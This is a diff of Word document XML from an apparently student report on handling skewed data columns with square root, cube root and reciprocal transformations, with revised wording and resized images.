-                              <w:pStyle w:val="BodyA"/>
                               <w:jc w:val="both"/>
                             </w:pPr>
                             <w:r>
-                              <w:t>As result, we have 19 columns skewed,  some are right skewed and others left skewed.</w:t>
+                              <w:t>As a result, we have 19 skewed columns, with some right skewness and others left skewness.</w:t>
                             </w:r>
                             <w:r>
-                              <w:t xml:space="preserve"> </w:t>
+                              <w:t xml:space="preserve"> Also, we can observe that there are 15 </w:t>
                             </w:r>
+                            <w:proofErr w:type="spellStart"/>
                             <w:r>
-                              <w:t>Given that the dataframe has 21 rows, opting to remove outliers would result in the elimination of 15 rows. In this scenario, the best approach is by transforming the data to mitigate skewness rather than dropping outliers.</w:t>
+                              <w:t>rowns</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> with outliers.</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
                             <w:pPr>
+                              <w:jc w:val="both"/>
                               <w:rPr>
                                 <w:lang w:val="en-US"/>
                               </w:rPr>
                             </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">Considering that the </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>dataframe</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> contains 21 rows, removing outliers would eliminat</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>e</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t xml:space="preserve"> 15 rows. In this scenario, the preferred approach is </w:t>
+                            </w:r>
+                            <w:proofErr w:type="gramStart"/>
+                            <w:r>
+                              <w:t>transform</w:t>
+                            </w:r>
+                            <w:proofErr w:type="gramEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> the data to mitigate skewness rather than removing outliers.</w:t>
+                            </w:r>
                           </w:p>
                         </w:txbxContent>
                       </wps:txbx>
@@ -10940,7 +11640,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="3F811877" id="Text Box 1" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:244.8pt;margin-top:101.8pt;width:203pt;height:186.5pt;z-index:251669504;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="white [3201]" strokeweight=".5pt">
+              <v:shape w14:anchorId="3F811877" id="Text Box 1" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:243.75pt;margin-top:95.45pt;width:203pt;height:186.5pt;z-index:251669504;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="white [3201]" strokeweight=".5pt">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -10962,25 +11662,55 @@
                     </w:p>
                     <w:p>
                       <w:pPr>
-                        <w:pStyle w:val="BodyA"/>
                         <w:jc w:val="both"/>
                       </w:pPr>
                       <w:r>
-                        <w:t>As result, we have 19 columns skewed,  some are right skewed and others left skewed.</w:t>
+                        <w:t>As a result, we have 19 skewed columns, with some right skewness and others left skewness.</w:t>
                       </w:r>
                       <w:r>
-                        <w:t xml:space="preserve"> </w:t>
+                        <w:t xml:space="preserve"> Also, we can observe that there are 15 </w:t>
                       </w:r>
+                      <w:proofErr w:type="spellStart"/>
                       <w:r>
-                        <w:t>Given that the dataframe has 21 rows, opting to remove outliers would result in the elimination of 15 rows. In this scenario, the best approach is by transforming the data to mitigate skewness rather than dropping outliers.</w:t>
+                        <w:t>rowns</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> with outliers.</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
                       <w:pPr>
+                        <w:jc w:val="both"/>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
                       </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">Considering that the </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>dataframe</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> contains 21 rows, removing outliers would eliminat</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>e</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t xml:space="preserve"> 15 rows. In this scenario, the preferred approach is </w:t>
+                      </w:r>
+                      <w:proofErr w:type="gramStart"/>
+                      <w:r>
+                        <w:t>transform</w:t>
+                      </w:r>
+                      <w:proofErr w:type="gramEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> the data to mitigate skewness rather than removing outliers.</w:t>
+                      </w:r>
                     </w:p>
                   </w:txbxContent>
                 </v:textbox>
@@ -11048,9 +11778,9 @@
                                 <w:noProof/>
                               </w:rPr>
                               <w:drawing>
-                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B3B3C9" wp14:editId="1042BC61">
-                                  <wp:extent cx="2660650" cy="3404870"/>
-                                  <wp:effectExtent l="0" t="0" r="6350" b="5080"/>
+                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B3B3C9" wp14:editId="319D97DD">
+                                  <wp:extent cx="2402541" cy="3074564"/>
+                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                   <wp:docPr id="1685088419" name="Picture 1" descr="A screenshot of a data&#10;&#10;Description automatically generated"/>
                                   <wp:cNvGraphicFramePr>
                                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -11063,7 +11793,7 @@
                                           <pic:cNvPicPr/>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId26"/>
+                                          <a:blip r:embed="rId27"/>
                                           <a:stretch>
                                             <a:fillRect/>
                                           </a:stretch>
@@ -11071,7 +11801,7 @@
                                         <pic:spPr>
                                           <a:xfrm>
                                             <a:off x="0" y="0"/>
-                                            <a:ext cx="2660650" cy="3404870"/>
+                                            <a:ext cx="2407230" cy="3080565"/>
                                           </a:xfrm>
                                           <a:prstGeom prst="rect">
                                             <a:avLst/>
@@ -11103,7 +11833,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="1EDE23F9" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:426.3pt;margin-top:48.3pt;width:477.5pt;height:276pt;z-index:-251648000;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:right;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+              <v:shape w14:anchorId="1EDE23F9" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:426.3pt;margin-top:48.3pt;width:477.5pt;height:276pt;z-index:-251648000;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:right;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -11115,9 +11845,9 @@
                           <w:noProof/>
                         </w:rPr>
                         <w:drawing>
-                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B3B3C9" wp14:editId="1042BC61">
-                            <wp:extent cx="2660650" cy="3404870"/>
-                            <wp:effectExtent l="0" t="0" r="6350" b="5080"/>
+                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B3B3C9" wp14:editId="319D97DD">
+                            <wp:extent cx="2402541" cy="3074564"/>
+                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                             <wp:docPr id="1685088419" name="Picture 1" descr="A screenshot of a data&#10;&#10;Description automatically generated"/>
                             <wp:cNvGraphicFramePr>
                               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -11130,7 +11860,7 @@
                                     <pic:cNvPicPr/>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId26"/>
+                                    <a:blip r:embed="rId27"/>
                                     <a:stretch>
                                       <a:fillRect/>
                                     </a:stretch>
@@ -11138,7 +11868,7 @@
                                   <pic:spPr>
                                     <a:xfrm>
                                       <a:off x="0" y="0"/>
-                                      <a:ext cx="2660650" cy="3404870"/>
+                                      <a:ext cx="2407230" cy="3080565"/>
                                     </a:xfrm>
                                     <a:prstGeom prst="rect">
                                       <a:avLst/>
@@ -11188,7 +11918,13 @@
         <w:pStyle w:val="BodyA"/>
       </w:pPr>
       <w:r>
-        <w:t>For data transformation, we need to understand the skewness, for right skewness we can apply some transformation methods, whereas for left skewness, we need to apply another transformation.</w:t>
+        <w:t>For data transformation, we need to understand the skewness, for right skewness we can apply some transformation methods, whereas for left skewness, we need to apply another transformation</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> method</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11207,7 +11943,13 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Square Root:</w:t>
+        <w:t xml:space="preserve">For right skewness, I’ve </w:t>
+      </w:r>
+      <w:r>
+        <w:t>applied</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the following transformation methods:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11215,13 +11957,221 @@
         <w:pStyle w:val="BodyA"/>
       </w:pPr>
       <w:r>
+        <w:t>Square Root</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Transformation</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Square root transformation is suitable for right-skewed (positively skewed) data</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">it has better performance in </w:t>
+      </w:r>
+      <w:r>
+        <w:t>mildly right-skewed</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="148B07A8" wp14:editId="28DA0D72">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>2426335</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>203200</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2550160" cy="1483360"/>
+                <wp:effectExtent l="0" t="0" r="21590" b="21590"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="1143755912" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2550160" cy="1483360"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyA"/>
+                              <w:jc w:val="both"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>After applying square root, the result was this:</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="both"/>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">As the result, some columns with mild skewness where adjusted, but the columns with </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                              <w:t>high</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> skewness </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">were </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                              <w:t>not.</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="148B07A8" id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:191.05pt;margin-top:16pt;width:200.8pt;height:116.8pt;z-index:251671552;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyA"/>
+                        <w:jc w:val="both"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>After applying square root, the result was this:</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="both"/>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">As the result, some columns with mild skewness where adjusted, but the columns with </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t>high</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> skewness </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">were </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t>not.</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="268FAB77" wp14:editId="2B806F38">
-            <wp:extent cx="2721429" cy="2160524"/>
-            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D86FF0E" wp14:editId="5EF37A0D">
+            <wp:extent cx="2227580" cy="1768548"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="3175"/>
             <wp:docPr id="157292078" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -11234,7 +12184,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27"/>
+                    <a:blip r:embed="rId28"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -11242,7 +12192,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2733966" cy="2170477"/>
+                      <a:ext cx="2227580" cy="1768548"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -11254,10 +12204,157 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>Cube Root</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Transformation</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ube rooting can help reduce the influence of extreme values or outliers in the data, making the data more robust to the presence of outliers.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50B758E6" wp14:editId="59C1E8EA">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:posOffset>205740</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>233680</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2550160" cy="1483360"/>
+                <wp:effectExtent l="0" t="0" r="21590" b="21590"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="1707593090" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2550160" cy="1483360"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="both"/>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>After the cube root transformation, the outcome was as follows: The cube root proved to be more effective than the square root in reducing skewness, but it was still not sufficient to fully adjust the highly skewed columns.</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="50B758E6" id="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:16.2pt;margin-top:18.4pt;width:200.8pt;height:116.8pt;z-index:251673600;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="both"/>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>After the cube root transformation, the outcome was as follows: The cube root proved to be more effective than the square root in reducing skewness, but it was still not sufficient to fully adjust the highly skewed columns.</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -11280,7 +12377,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId28"/>
+                    <a:blip r:embed="rId29"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -11303,8 +12400,169 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Reciprocal Transformation</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>R</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>eciprocal transformation is effective in reducing the impact of outliers, especially for data with right-skewness.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="446A87AD" wp14:editId="5C15B431">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:posOffset>3312459</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>214742</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2550160" cy="1483360"/>
+                <wp:effectExtent l="0" t="0" r="21590" b="21590"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="1828869735" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2550160" cy="1483360"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="both"/>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>After the cube root transformation, the outcome was as follows: The cube root proved to be more effective than the square root in reducing skewness, but it was still not sufficient to fully adjust the highly skewed columns.</w:t>
